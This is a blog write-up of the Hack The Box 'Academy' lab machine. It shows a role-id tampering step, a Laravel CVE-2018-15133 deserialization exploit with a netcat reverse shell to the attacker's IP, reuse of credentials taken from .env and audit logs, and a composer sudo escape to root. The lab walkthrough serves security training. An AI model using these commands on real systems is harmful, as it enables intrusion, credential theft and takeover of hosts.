Posted on by

HTB: Academy

Details

This machine is Academy from Hack The Box

Recon

kali@kali:~$ nmap -sV -Pn -p- 10.10.10.215
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-10 06:31 EST
Nmap scan report for 10.10.10.215
Host is up (0.018s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.91%I=7%D=11/10%Time=5FAA7A1D%P=x86_64-pc-linux-gnu%r(
SF:NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPO
SF:ptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVer
SF:sionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,
SF:2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0f
SF:Invalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"
SF:)%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x0
SF:1\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCooki
SF:e,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\
SF:"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05
SF:\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY
SF:000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOption
SF:s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\
SF:x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,
SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
SF:0")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\
SF:0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.90 seconds

User

http://10.10.10.215 redirected to http://academy.htb/ so I added it to hosts

Screenshot 1

I then clicked register

Screenshot 2

And in the source

Screenshot 3

So it takes a role id as part of the form, I kinda just hoped 1 would be admin, so I caught the sign up request in burp and changed it to a 1

Screenshot 4

This redirected to a login screen

Screenshot 5

So I logged in with my new creds

Screenshot 6

There was nothing obviously useful here, so I dirbusted

Screenshot 7

So I went to the admin page

Screenshot 8

And tried my creds again

Screenshot 9

So I added http://dev-staging-01.academy.htb/ to hosts and took a look

Screenshot 10

Debug mode laravel, and I found the APP_KEY in the env dump

APP_KEY "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="

And an exploit that could use this https://github.com/kozmic/laravel-poc-CVE-2018-15133, I used https://github.com/ambionics/phpggc to generate the payload

kali@kali:~$ ./phpggc Laravel/RCE1 -b system 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f'
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjc4OiJybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4yMSA0NDQ0ID4vdG1wL2YiO30=

And then the exploit 

kali@kali:~$ ./cve-2018-15133.php dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjc4OiJybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4yMSA0NDQ0ID4vdG1wL2YiO30=
PoC for Unserialize vulnerability in Laravel <= 5.6.29 (CVE-2018-15133) by @kozmic

HTTP header for POST request:
X-XSRF-TOKEN: eyJpdiI6IlpvXC9tOSszWmpcL3NjSDlNZmw5a1lmQT09IiwidmFsdWUiOiJ4azdcL1NsXC9cL2U1RHFOZFpRS2l3TWpqKzY4V1krVm1lUk5xQTVpa3YwMnpjWTV2ZHp2U1pJdkZvZldKQ25MS1NmV0FHQVJWenBXd1hZVUdwek5jd0VGTlhRcnFDZHdJSGpsY2xSekswdGg2cTZNTE8xUFhuUlNGbDNtbHppc2ZyR0xOVHVPSURUN0J0aVc0ZE5wdEhJOXJranpzYVI2T0V5cERLWEo4TTZGVzJHOEUzVG1NVHROenVENjMzbnRIcjlKeXVIT2tCRDRMNTRhaDRBbGNMRUpXbmZzMUs1K1VvNFMrbGx0MlltdTZMNFJwSjZQaDZzazJrb3FvZ1ZPYzkwelpES0RtNDk5emUyRU1JSTk1Q21WM05OM0Y2Uk4wY0JiMmUzMkJcL2VkbkZjNk9zM01HMWlLZzk5QzBcL1hJbk9ydVA4WkJ1ckN6UVJLUktJNW9PNllJQT09IiwibWFjIjoiZjUyMTA5MmFhMWQwMzM1NTliOGQ2YTEwNDM1NmE5ZmU0ODljYzExYWU0NzEyZmVhZTcyYmNhNmE3ZTc4YjNjNSJ9

So I set a listener

kali@kali:~$ nc -nlvp 4444

And fired the exploit

kali@kali:~$ curl -X POST http://dev-staging-01.academy.htb/ -H 'X-XSRF-TOKEN: eyJpdiI6IlpvXC9tOSszWmpcL3NjSDlNZmw5a1lmQT09IiwidmFsdWUiOiJ4azdcL1NsXC9cL2U1RHFOZFpRS2l3TWpqKzY4V1krVm1lUk5xQTVpa3YwMnpjWTV2ZHp2U1pJdkZvZldKQ25MS1NmV0FHQVJWenBXd1hZVUdwek5jd0VGTlhRcnFDZHdJSGpsY2xSekswdGg2cTZNTE8xUFhuUlNGbDNtbHppc2ZyR0xOVHVPSURUN0J0aVc0ZE5wdEhJOXJranpzYVI2T0V5cERLWEo4TTZGVzJHOEUzVG1NVHROenVENjMzbnRIcjlKeXVIT2tCRDRMNTRhaDRBbGNMRUpXbmZzMUs1K1VvNFMrbGx0MlltdTZMNFJwSjZQaDZzazJrb3FvZ1ZPYzkwelpES0RtNDk5emUyRU1JSTk1Q21WM05OM0Y2Uk4wY0JiMmUzMkJcL2VkbkZjNk9zM01HMWlLZzk5QzBcL1hJbk9ydVA4WkJ1ckN6UVJLUktJNW9PNllJQT09IiwibWFjIjoiZjUyMTA5MmFhMWQwMzM1NTliOGQ2YTEwNDM1NmE5ZmU0ODljYzExYWU0NzEyZmVhZTcyYmNhNmE3ZTc4YjNjNSJ9'

In the listener

connect to [10.10.14.21] from (UNKNOWN) [10.10.10.215] 35304
/bin/sh: 0: can't access tty; job control turned off
$

A shell

$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@academy:/var/www/html/htb-academy-dev-01/public$

www-data@academy:/home$ ls -la
ls -la
total 32
drwxr-xr-x  8 root     root     4096 Aug 10 00:34 .
drwxr-xr-x 20 root     root     4096 Aug  7 12:07 ..
drwxr-xr-x  2 21y4d    21y4d    4096 Aug 10 00:34 21y4d
drwxr-xr-x  2 ch4p     ch4p     4096 Aug 10 00:34 ch4p
drwxr-xr-x  4 cry0l1t3 cry0l1t3 4096 Aug 12 21:58 cry0l1t3
drwxr-xr-x  3 egre55   egre55   4096 Aug 10 23:41 egre55
drwxr-xr-x  2 g0blin   g0blin   4096 Aug 10 00:34 g0blin
drwxr-xr-x  5 mrb3n    mrb3n    4096 Aug 12 22:19 mrb3n

There were a few users, I found the user.txt was in cry0l1t3’s

www-data@academy:/home$ find . -name "user.txt" 2>/dev/null
find . -name "user.txt" 2>/dev/null
./cry0l1t3/user.txt

It turned out the main web app was laravel too, so I checked its env file

www-data@academy:/var/www/html/academy$ cat .env
cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"

And tried the password mySup3rP4s5w0rd!! on ssh for cry0l1t3

kali@kali:~$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 10 Nov 2020 01:30:51 PM UTC

  System load:             0.0
  Usage of /:              44.9% of 15.68GB
  Memory usage:            24%
  Swap usage:              0%
  Processes:               197
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.215
  IPv6 address for ens160: dead:beef::250:56ff:feb9:1c47

 * Introducing self-healing high availability clustering for MicroK8s!
   Super simple, hardened and opinionated Kubernetes for production.

     https://microk8s.io/high-availability

0 updates can be installed immediately.
0 of these updates are security updates.

Last login: Wed Aug 12 21:58:45 2020 from 10.10.14.2
$

So I grabbed user

$ ls -la
total 32
drwxr-xr-x 4 cry0l1t3 cry0l1t3 4096 Aug 12 21:58 .
drwxr-xr-x 8 root     root     4096 Aug 10 00:34 ..
lrwxrwxrwx 1 root     root        9 Aug 10 23:41 .bash_history -> /dev/null
-rw-r--r-- 1 cry0l1t3 cry0l1t3  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 cry0l1t3 cry0l1t3 3771 Feb 25  2020 .bashrc
drwx------ 2 cry0l1t3 cry0l1t3 4096 Aug 12 21:58 .cache
drwxrwxr-x 3 cry0l1t3 cry0l1t3 4096 Aug 12 02:30 .local
-rw-r--r-- 1 cry0l1t3 cry0l1t3  807 Feb 25  2020 .profile
-r--r----- 1 cry0l1t3 cry0l1t3   33 Aug 10 23:46 user.txt

$ cat user.txt
[REDACTED]

Root

Interestingly, I was in the adm group

$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)

This means I can read more files in /var/log. So I grepped the log files for the other users usernames

$ cd /var/log
$ grep 'mrb3n\|21y4d\|ch4p\|g0blin' -R
[SNIP]
audit/audit.log.3:type=CRED_REFR msg=audit(1597271161.009:331): pid=3143 uid=0 auid=1002 ses=12 msg='op=PAM:setcred grantors=pam_permit,pam_cap acct="mrb3n" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
[SNIP]
auth.log.1:Oct 21 10:55:11 academy sshd[1135]: Accepted password for mrb3n from 10.10.14.5 port 33576 ssh2
auth.log.1:Oct 21 10:55:11 academy sshd[1135]: pam_unix(sshd:session): session opened for user mrb3n by (uid=0)
auth.log.1:Oct 21 10:55:11 academy systemd-logind[831]: New session 2 of user mrb3n.
auth.log.1:Oct 21 10:55:11 academy systemd: pam_unix(systemd-user:session): session opened for user mrb3n by (uid=0)
auth.log.1:Oct 21 10:57:06 academy su: (to root) mrb3n on pts/0
auth.log.1:Oct 21 10:57:06 academy su: pam_unix(su-l:session): session opened for user root by mrb3n(uid=1001)
auth.log.1:Oct 21 10:57:43 academy sshd[1135]: pam_unix(sshd:session): session closed for user mrb3n
[SNIP]

So mrb3n looks interesting 

$ grep -Ri mrb3n -A 3 -B 3
[SNIP]
audit/audit.log.3-type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
[SNIP]

The data decoded to

mrb3n_Ac@d3my!

So I tried it as their password

ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 10 Nov 2020 02:31:23 PM UTC

  System load:             0.0
  Usage of /:              44.9% of 15.68GB
  Memory usage:            26%
  Swap usage:              0%
  Processes:               243
  Users logged in:         1
  IPv4 address for ens160: 10.10.10.215
  IPv6 address for ens160: dead:beef::250:56ff:feb9:1c47

 * Introducing self-healing high availability clustering for MicroK8s!
   Super simple, hardened and opinionated Kubernetes for production.

     https://microk8s.io/high-availability

0 updates can be installed immediately.
0 of these updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Oct 21 10:55:11 2020 from 10.10.14.5
$

I then checked sudo

$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Composer has a GTFO bins entry https://gtfobins.github.io/gtfobins/composer/

$ TF=$(mktemp -d)
$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
$ sudo composer --working-dir=$TF run-script x
[sudo] password for mrb3n:
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
#

And I had a root shell

# id
uid=0(root) gid=0(root) groups=0(root)

# cd /root
# ls -la
total 56
drwx------  7 root root 4096 Nov  6 09:54 .
drwxr-xr-x 20 root root 4096 Aug  7 12:07 ..
-r--r-----  1 root root 1748 Nov  6 09:53 academy.txt
lrwxrwxrwx  1 root root    9 Aug 10 23:40 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  2 root root 4096 Aug  8 18:52 .cache
drwxr-xr-x  3 root root 4096 Aug  8 21:19 .composer
drwxr-xr-x  3 root root 4096 Aug  7 13:51 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-r--r-----  1 root root   33 Aug 10 23:44 root.txt
-rw-r--r--  1 root root   66 Aug 12 02:43 .selected_editor
drwxr-xr-x  3 root root 4096 Aug  7 12:12 snap
drwx------  2 root root 4096 Aug  7 12:12 .ssh
-rw-------  1 root root 3299 Aug 13 12:16 .viminfo
-rw-r--r--  1 root root  186 Sep 14 22:38 .wget-hsts

# cat root.txt
[REDACTED]

# cat academy.txt
██╗  ██╗████████╗██████╗      █████╗  ██████╗ █████╗ ██████╗ ███████╗███╗   ███╗██╗   ██╗
██║  ██║╚══██╔══╝██╔══██╗    ██╔══██╗██╔════╝██╔══██╗██╔══██╗██╔════╝████╗ ████║╚██╗ ██╔╝
███████║   ██║   ██████╔╝    ███████║██║     ███████║██║  ██║█████╗  ██╔████╔██║ ╚████╔╝
██╔══██║   ██║   ██╔══██╗    ██╔══██║██║     ██╔══██║██║  ██║██╔══╝  ██║╚██╔╝██║  ╚██╔╝
██║  ██║   ██║   ██████╔╝    ██║  ██║╚██████╗██║  ██║██████╔╝███████╗██║ ╚═╝ ██║   ██║
╚═╝  ╚═╝   ╚═╝   ╚═════╝     ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝     ╚═╝   ╚═╝

We've been hard at work.

Check out our brand new training platform, Hack the Box Academy!

https://academy.hackthebox.eu/

Register an account and browse our initial list of courses!

   _.-'`'-._
   .-'    _    '-.
    `-.__  `\_.-'
      |  `-``\|
      `-.....-H
              T
              B

Published by Jack

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.